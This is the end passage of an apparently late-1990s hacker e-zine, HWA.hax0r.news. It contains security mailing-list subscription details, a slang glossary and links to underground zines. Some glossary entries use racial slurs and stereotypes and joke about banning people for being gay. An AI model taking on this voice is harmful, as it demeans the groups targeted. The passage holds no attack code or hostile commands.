              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributors.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 
          
          
     Win2k Security Advice Mailing List (new added Nov 30th 1999)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
      To subscribe:
      
      
      send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
      to  listserv@listserv.ntsecurity.net
      
     
      
      Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
      questions or comments about the list please feel free to contact the list
      moderator, Steve Manzuik, at steve@win2ksecadvice.net.
      
      To see what you've missed recently on the list, or to research an item
      of interest, be sure to visit the Web-based archives located at:
      http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
      
      ==============
      NTSecurity.net brings the security community a brand new (Oct 99) and
      much-requested Windows security mailing list. This new moderated mailing list,
      Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
      discussion of Windows-related security issues.
      
      With a firm and unwavering commitment towards timely full disclosure, this
      new resource promises to become a great forum for open discussion
      regarding security-related bugs, vulnerabilities, potential exploits, viruses,
      worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
      and we openly invite all security minded individuals, be they white hat,
      gray hat, or black hat, to join the new mailing list.
      
      While Win2KSecAdvice was named in the spirit of Microsoft's impending product
      line name change, and meant to reflect the list's security focus both now and
      in the long run, it is by no means limited to security topics centered around
      Windows 2000. Any security issues that pertain to Windows-based networking are
      relevant for discussion, including all Windows operating systems, MS Office,
      MS BackOffice, and all related third party applications and hardware.
      
      The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
      a security risk, it's relevant to the list.
      
      The list archives are available on the Web at http://www.ntsecurity.net,
      which include a List Charter and FAQ, as well as Web-based searchable list
      archives for your research endeavors.
      
      SAVE THIS INFO FOR YOUR REFERENCE:
      
      To post to the list simply send your email to
      win2ksecadvice@listserv.ntsecurity.net
      
      To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
      listserv@listserv.ntsecurity.net
      
      Regards,
      
      Steve Manzuik, List Moderator
      Win2K Security Advice
      steve@win2ksecadvice.net     

    @HWA
    

A.9  What's in a name? Why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? Never mind, if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up and comers, I'd highly recommend you get that book. It's almost
     like buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
                    _   ___        ___      _____ _    ___
                   | | | \ \      / / \    |  ___/ \  / _ \
                   | |_| |\ \ /\ / / _ \   | |_ / _ \| | | |
                   |  _  | \ V  V / ___ \ _|  _/ ___ \ |_| |
                   |_| |_|  \_/\_/_/   \_(_)_|/_/   \_\__\_\
                     

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal usage and use in this zine are
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavy equals" sign means "almost equal" to. If written
             as =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or 'can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, 
            Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit. Like when you're kb'd from our chans for being gay it's TFS,

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
            
A.11  NEW Underground E-Zines
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      New releases:
      
      SET Saqueadores Edición Técnica: http://www.set-ezine.org
      f41th magazine issue 12 is out.: http://f41th.com/index2.html
      Digital Defiance 5 (!) is out..: http://www.hackers.cx
      
      
      New zines on the scene:       

      InET.......................... http://www.warpedreality.com/inet
      Hack In the Box............... http://www.thelimit.net/hitb      
      Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt      
      DataZine...................... http://www.tdcore.com
      Napalm........................ http://napalm.firest0rm.org/
      Digital Defiance.............. http://www.hackers.cx  
      b0g .......................... http://www.b0g.org
      
      
            
   @HWA              
     
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

     1998, 1999, 1900 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  								  2000 (k)

